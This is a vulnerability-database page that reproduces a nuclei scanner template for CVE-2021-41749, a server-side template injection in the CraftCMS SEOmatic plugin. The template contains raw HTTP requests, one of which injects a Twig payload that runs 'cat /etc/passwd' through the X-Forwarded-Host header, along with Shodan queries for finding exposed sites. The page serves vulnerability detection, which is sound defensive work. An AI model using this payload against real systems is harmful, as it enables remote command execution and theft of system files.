Lucene search
K

CraftCMS SEOmatic - Server-Side Template Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 258 Views

CraftCMS SEOmatic - Server-Side Template Injection allows remote code executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-41749
12 Jun 202211:15
attackerkb
CNNVD
Nystudio107 Seomatic 代码注入漏洞
12 Jun 202200:00
cnnvd
CVE
CVE-2021-41749
12 Jun 202211:00
cve
Cvelist
CVE-2021-41749
12 Jun 202211:00
cvelist
Github Security Blog
Code Injection in SEOmatic
13 Jun 202200:00
github
NVD
CVE-2021-41749
12 Jun 202211:15
nvd
OSV
GHSA-G7XR-V82W-QGGQ Code Injection in SEOmatic
13 Jun 202200:00
osv
Prion
Remote code execution
12 Jun 202211:15
prion
Veracode
Server-Side Template Injection
13 Jun 202204:29
veracode
id: CVE-2021-41749

info:
  name: CraftCMS SEOmatic - Server-Side Template Injection
  author: iamnoooob,ritikchaddha
  severity: critical
  description: |
    In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
  impact: |
    Unauthenticated attackers can exploit SSTI via X-Forwarded-Host header to execute arbitrary Twig templates and system commands, achieving complete server compromise.
  remediation: |
    Upgrade to CraftCMS SEOmatic version 3.4.12 or later.
  reference:
    - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41749
    - https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41749
    cwe-id: CWE-94
    epss-score: 0.17249
    epss-percentile: 0.96729
    cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nystudio107
    product: seomatic
    framework: craft_cms
    shodan-query:
      - 'X-Powered-By: Craft CMS html:"SEOmatic"'
      - "x-powered-by: craft cms"
      - 'x-powered-by: craft cms html:"seomatic"'
  tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms,vuln
variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}
        Cache-Control: max-age=0

      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
        Cache-Control: max-age=0

    skip-variables-check: true
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)'
          - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502200cadc567a59e2f3543c03e1299a1ac4c59f82928f036ca28295c4da26a6afa8202210089bc15ff4b3f781d7a406f816ed3354b237bb47b0852ddcf9dac2f1624dea4d9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.17249
258